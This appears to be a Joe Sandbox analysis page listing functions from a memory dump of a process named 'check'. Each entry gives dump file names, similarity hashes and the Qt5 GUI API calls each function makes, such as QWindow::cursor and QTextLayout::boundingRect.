                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Text$?format@Format@@InlineObject@@malloc
                                                                                                                                                                                                                                          • String ID: QTextInlineObject$format$format(self) -> QTextFormat
                                                                                                                                                                                                                                          • API String ID: 2931889132-2854710909
                                                                                                                                                                                                                                          • Opcode ID: 7eda8cf6d3043e79bb2220248acb1dcaff28ab64cbcca2d73981cb2438d7d93b
                                                                                                                                                                                                                                          • Instruction ID: 05f4e722221e452714bb403ea0f05e98d651d027f2ca75c0aea650ece6f2c0ef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7eda8cf6d3043e79bb2220248acb1dcaff28ab64cbcca2d73981cb2438d7d93b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02113577A08A46C1EB209F21E84A6A933A4FB44FD0F918032DA9E07320EF7DF559C744
                                                                                                                                                                                                                                          Function 00007FF89D96BEF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?cursor@QWindow@@QEBA?AVQCursor@@XZ.QT5GUI ref: 00007FF89D96BF48
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?cursor@Cursor@@Window@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$cursor$cursor(self) -> QCursor
                                                                                                                                                                                                                                          • API String ID: 2860300759-1668880385
                                                                                                                                                                                                                                          • Opcode ID: 69be702e468362f1bd71fb5158563cf982a12c9e9e08dcf7ed756cdfe2cd2068
                                                                                                                                                                                                                                          • Instruction ID: 71d5ef4fde247a294ec249a67f6defa92040bc15791ca946909d790437b88f43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69be702e468362f1bd71fb5158563cf982a12c9e9e08dcf7ed756cdfe2cd2068
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B110977A08A4681EB109F65E8496A933A4FB44FD4F918032D99E07320EF7CF559C744
                                                                                                                                                                                                                                          Function 00007FF89D999AC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toVector4D@QVector2D@@QEBA?AVQVector4D@@XZ.QT5GUI ref: 00007FF89D999B18
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Vector4$Vector2malloc
                                                                                                                                                                                                                                          • String ID: QVector2D$toVector4D$toVector4D(self) -> QVector4D
                                                                                                                                                                                                                                          • API String ID: 311956697-3690013905
                                                                                                                                                                                                                                          • Opcode ID: e5904921a024085fc3ee456001a23ef0ffaa9fab3ce9227f7a8231a42308805b
                                                                                                                                                                                                                                          • Instruction ID: 11559165276ce97c929e3c6fcab93644484a441bc32f08259508103183533ae7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5904921a024085fc3ee456001a23ef0ffaa9fab3ce9227f7a8231a42308805b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1112777A08A46C1EB109F61E84A6A933E4FB44FD4F918032CA8E47320EF7CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D955EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?boundingRect@QTextLayout@@QEBA?AVQRectF@@XZ.QT5GUI ref: 00007FF89D955F18
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?boundingLayout@@RectRect@Textmalloc
                                                                                                                                                                                                                                          • String ID: QTextLayout$boundingRect$boundingRect(self) -> QRectF
                                                                                                                                                                                                                                          • API String ID: 620106861-2289836743
                                                                                                                                                                                                                                          • Opcode ID: d6a6e2bae909e763cc0f0e69c341b9404335dca903f927abcbb307d81ef0c13c
                                                                                                                                                                                                                                          • Instruction ID: 8902a82e4d6e638211ca9c599311313b37e83b6651e829f6d9e26e9fcbcc1b5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a6e2bae909e763cc0f0e69c341b9404335dca903f927abcbb307d81ef0c13c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B110577A09A46C1EB109F65E8496A933A4FB44FD0F918032DA9E47320EF7CF559C344
                                                                                                                                                                                                                                          Function 00007FF89D963EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?discardCommand@QSessionManager@@QEBA?AVQStringList@@XZ.QT5GUI ref: 00007FF89D963F18
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?discardCommand@List@@Manager@@SessionStringmalloc
                                                                                                                                                                                                                                          • String ID: QSessionManager$discardCommand$discardCommand(self) -> List[str]
                                                                                                                                                                                                                                          • API String ID: 1524762267-3557297886
                                                                                                                                                                                                                                          • Opcode ID: aa8cf092a7c0d09c87d1ca4e65e314cce4992f861144479576a2b979a166d475
                                                                                                                                                                                                                                          • Instruction ID: 23ff79764c2678dd9e9b197ce4dc7254e4d143515bdcf4ed5ba2749c29bab7e0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa8cf092a7c0d09c87d1ca4e65e314cce4992f861144479576a2b979a166d475
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE11F777A09A8681EB10DF65E88A6A933A4FB44FD0F914032DA8E47320EF7DE559C344
                                                                                                                                                                                                                                          Function 00007FF89D977ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@@XZ.QT5GUI ref: 00007FF89D977F28
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?windowFlags@Qt@@@@State@States@WindowWindow@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$windowStates$windowStates(self) -> Qt.WindowStates
                                                                                                                                                                                                                                          • API String ID: 1775758369-1511991782
                                                                                                                                                                                                                                          • Opcode ID: 825799bd466c0ee590184e4f0af9fa1dfd37a07b5e19c3150ea2d39bdba76108
                                                                                                                                                                                                                                          • Instruction ID: 597f5cec6be6508e64f527ced8180fc35ab096f1a8e25aa7d7b2698ea78bafa2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 825799bd466c0ee590184e4f0af9fa1dfd37a07b5e19c3150ea2d39bdba76108
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73113977A08A46C6EB109F21E8496A933A4FB44FD0F914032CA8E07320EF7CE559C348
                                                                                                                                                                                                                                          Function 00007FF89D9B7E30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?font@QPaintEngineState@@QEBA?AVQFont@@XZ.QT5GUI ref: 00007FF89D9B7E88
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?font@EngineFont@@PaintState@@malloc
                                                                                                                                                                                                                                          • String ID: QPaintEngineState$font$font(self) -> QFont
                                                                                                                                                                                                                                          • API String ID: 746269019-3572444425
                                                                                                                                                                                                                                          • Opcode ID: 6b47000e48d53edac6b1509c2b147baff5b29d784d052b693a2462b825267cc1
                                                                                                                                                                                                                                          • Instruction ID: 62e079241875ce786554eb3ad39b78d851ec438e05b30fe7b1d00fde77d8810c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b47000e48d53edac6b1509c2b147baff5b29d784d052b693a2462b825267cc1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28110977A09A4681EB10DF65E8496A933A4FF88FD4F918032DA8E07320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D955A30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?takeVerticalHeaderItem@QStandardItemModel@@QEAAPEAVQStandardItem@@H@Z.QT5GUI ref: 00007FF89D955A87
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
